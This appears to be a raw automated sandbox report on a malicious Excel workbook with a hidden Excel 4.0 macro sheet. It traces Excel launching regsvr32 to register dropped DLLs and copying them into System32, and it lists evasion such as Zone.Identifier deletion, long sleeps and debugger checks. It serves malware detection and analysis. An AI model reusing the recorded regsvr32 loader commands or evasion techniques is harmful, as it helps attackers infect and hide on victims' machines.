Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180017BA8 5_2_0000000180017BA8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000EBAC 5_2_000000018000EBAC
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018001B3B8 5_2_000000018001B3B8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180012BB8 5_2_0000000180012BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800257C0 5_2_00000001800257C0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180008BC0 5_2_0000000180008BC0
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800117C4 5_2_00000001800117C4
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_00000001800227E0 5_2_00000001800227E0
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_003B0000 6_2_003B0000
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_00000001800083F8 6_2_00000001800083F8
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180026410 6_2_0000000180026410
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000680F 6_2_000000018000680F
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180025C30 6_2_0000000180025C30
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180013674 6_2_0000000180013674
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180017C8C 6_2_0000000180017C8C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000A48C 6_2_000000018000A48C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000BEF0 6_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180029710 6_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180026F14 6_2_0000000180026F14
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180023748 6_2_0000000180023748
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180001D58 6_2_0000000180001D58
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018002B368 6_2_000000018002B368
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180001378 6_2_0000000180001378
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180010590 6_2_0000000180010590
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_00000001800091A8 6_2_00000001800091A8
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_00000001800165E4 6_2_00000001800165E4
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180018FE8 6_2_0000000180018FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018001ABE8 6_2_000000018001ABE8
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180029DF0 6_2_0000000180029DF0
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_00000001800243F4 6_2_00000001800243F4
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180015DF4 6_2_0000000180015DF4
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_00000001800011F4 6_2_00000001800011F4
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_00000001800247FC 6_2_00000001800247FC
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018001DBFC 6_2_000000018001DBFC
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000FE08 6_2_000000018000FE08
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018001100C 6_2_000000018001100C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180027E14 6_2_0000000180027E14
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000B618 6_2_000000018000B618
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180023220 6_2_0000000180023220
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180027C28 6_2_0000000180027C28
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180020A34 6_2_0000000180020A34
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180007634 6_2_0000000180007634
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180022E38 6_2_0000000180022E38
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000E638 6_2_000000018000E638
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018002143C 6_2_000000018002143C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018001303C 6_2_000000018001303C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018002A840 6_2_000000018002A840
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180003840 6_2_0000000180003840
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000B444 6_2_000000018000B444
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000F048 6_2_000000018000F048
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018002AC4C 6_2_000000018002AC4C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180010050 6_2_0000000180010050
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180010250 6_2_0000000180010250
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180003050 6_2_0000000180003050
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180011E5C 6_2_0000000180011E5C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000445C 6_2_000000018000445C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000C85C 6_2_000000018000C85C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180003460 6_2_0000000180003460
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180026A64 6_2_0000000180026A64
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180004264 6_2_0000000180004264
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180029C6C 6_2_0000000180029C6C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018001586C 6_2_000000018001586C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000406C 6_2_000000018000406C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000E06C 6_2_000000018000E06C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000BC70 6_2_000000018000BC70
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000F678 6_2_000000018000F678
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000E278 6_2_000000018000E278
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018001447C 6_2_000000018001447C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180005E7C 6_2_0000000180005E7C
Found potential string decryption / allocating functions
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74F7FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70C7FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF706BD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D2B3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF7067FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70CBD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74FBD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00000001800153F4 appears 48 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D27FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF706B3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D2BD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74FB3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70CB3B0 appears 148 times
Found a hidden Excel 4.0 Macro sheet
Source: Datei_26744565.xls Macro extractor: Sheet name: PKEKPPGEKKPGE
Source: Datei_26744565.xls Macro extractor: Sheet name: PKEKPPGEKKPGE
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll 52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll 306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
Source: Datei_26744565.xls ReversingLabs: Detection: 39%
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR55EC.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@17/18@4/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Datei_26744565.xls OLE indicator, Workbook stream: true
Source: Datei_26744565.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180029710 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 4_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Datei_26744565.xls Initial sample: OLE indicators vbamacros = False
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006951 pushad ; retf 3_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180006951 pushad ; retf 5_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180006951 pushad ; retf 7_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180006951 pushad ; retf 9_2_0000000180006953
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_000007FEF9D30CC0
PE file contains an invalid checksum
Source: T35PENELLOsp[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5caa2
Source: Jf8[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5ef33
Source: uxevr1.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5ef33
Source: 1Cb5zOjLgWGDemz55C5[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x64194
Source: uxevr3.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x64194
Source: uxevr2.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x644de
Source: 4HWP0KQI[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x644de
Source: uxevr4.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5caa2
Registers a DLL
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy) Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\MreGm\Zazriwdkuo.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\AnDDvm\lwQjfM.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\IvkabqgmpEJ\fEKh.dll:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\regsvr32.exe TID: 1484 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2368 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2104 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1812 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 324 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1156 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2252 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1288 Thread sleep time: -240000s >= -30000s Jump to behavior
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.6 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.6 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 7.7 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 7.7 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 4_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 6_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 8_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 10_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: regsvr32.exe, 00000007.00000002.932271979.000000000023A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000007FEF9D23280
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error, 3_2_000007FEF9D30215
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_000007FEF9D30CC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000007FEF9D23280
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_000007FEF9D2BE50
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF74F3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_000007FEF74F3280
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF74FBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_000007FEF74FBE50
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF70CBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_000007FEF70CBE50
